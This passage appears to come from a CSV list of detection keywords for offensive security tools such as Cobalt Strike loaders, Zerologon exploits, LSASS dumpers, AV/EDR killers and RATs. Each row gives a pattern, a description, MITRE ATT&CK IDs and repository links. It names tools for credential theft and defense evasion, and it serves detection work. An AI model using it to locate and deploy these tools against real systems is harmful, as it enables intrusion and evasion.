simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*yanncam/ShuckNT*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*YaraFilters*lsassdump.yar*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*yasserjanah/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,1,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*Yaxser/Backstab*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*Yay! No SYSMON here!*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,0,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*YDHCUI/csload.net*,offensive_tool_keyword,cobaltstrike,A cobaltstrike shellcode loader - past domestic mainstream antivirus software,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/csload.net,1,1,N/A,10,10,123,13,2021-05-21T02:36:03Z,2021-05-20T08:24:16Z -*YDHCUI/manjusaka*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*ylAo2kAlUS2kYkala!*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Yml0c3kubWl0LmVkdQ==*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*YmxvY2s9MTAw*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*yogeshojha/rengine*,offensive_tool_keyword,rengine,reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/yogeshojha/rengine,1,1,N/A,N/A,10,5904,923,2023-10-02T14:05:29Z,2020-05-03T12:13:12Z -*YOLOP0wn/POSTDump*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*You are trying to target a User Group Policy Object while running the embedded SMB server*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*You_spin_me__round.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*youcantpatchthis*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,0,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*youhacker55/PayGen*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,,N/A,,, -*Your Moms Smart Vibrator*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,user-agent,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*ysoserial -*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial-*.zip,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial.exe *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*ysoserial.net*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial.sln*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*yunuscadirci/CallStranger*,offensive_tool_keyword,POC,Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration,T1046 - T1595 - T1587,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/yunuscadirci/CallStranger,1,1,N/A,N/A,4,391,70,2021-08-07T16:48:55Z,2020-06-08T07:37:49Z -*Yuuup!! Pass Cracked*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*YwBhAGwAYwA=*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Z4nzu/hackingtool*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*zabbix_session_exp.py -*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py,1,0,N/A,N/A,1,8,7,2022-02-23T16:37:13Z,2022-02-23T16:34:03Z -*zabbix_session_exp.py https*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1505 - T1550 - T1574 - T1210 - T1110,TA0001 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Fa1c0n35/zabbix-cve-2022-23131,1,0,N/A,N/A,1,0,0,2022-02-27T11:31:02Z,2022-02-27T11:30:53Z -*zabbix_session_exp.py*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/cve-2022-23131,1,1,N/A,N/A,2,146,48,2022-02-24T15:02:12Z,2022-02-18T11:51:47Z -*zarp.py*,offensive_tool_keyword,zarp,A network attack framework.,T1484 - T1498 - T1569,TA0001 - TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/hatRiot/zarp,1,0,N/A,N/A,10,1376,340,2023-05-01T20:18:05Z,2012-09-16T18:02:34Z -*zblurx/certsync*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,1,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*zblurx/dploot*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*zcgonvh/DCOMPotato*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*zed2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*zenmap.exe*,greyware_tool_keyword,nmap,When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*zenoss_3x_command_execution*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*zer0condition/mhydeath*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*zeroday-powershell*,offensive_tool_keyword,zeroday-powershell,This will exploit the Windows operating system allowing you to modify the file Some.dll.,T1203 - T1574.001 - T1546.011,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/OneLogicalMyth/zeroday-powershell,1,1,N/A,N/A,4,323,96,2018-09-12T09:03:04Z,2018-09-10T16:34:14Z -*zerologon clone *https*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*zerologon.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1071,TA0008 - TA0006,N/A,N/A,Exploitation tools,https://github.com/michaelpoznecki/zerologon,1,1,N/A,N/A,1,9,4,2020-09-15T16:31:59Z,2020-09-15T05:32:24Z -*zerologon.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*zerologon.x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*zerologon_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ZeroLogon-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*zerologon-restore * -target-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ZeroLogonScanner.*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*ZeroMemoryEx/Amsi-Killer*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*ZeroMemoryEx/Blackout*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*zerosum0x0*,offensive_tool_keyword,zerosum0x0,github repo username hosting backdoors pocs and exploitation 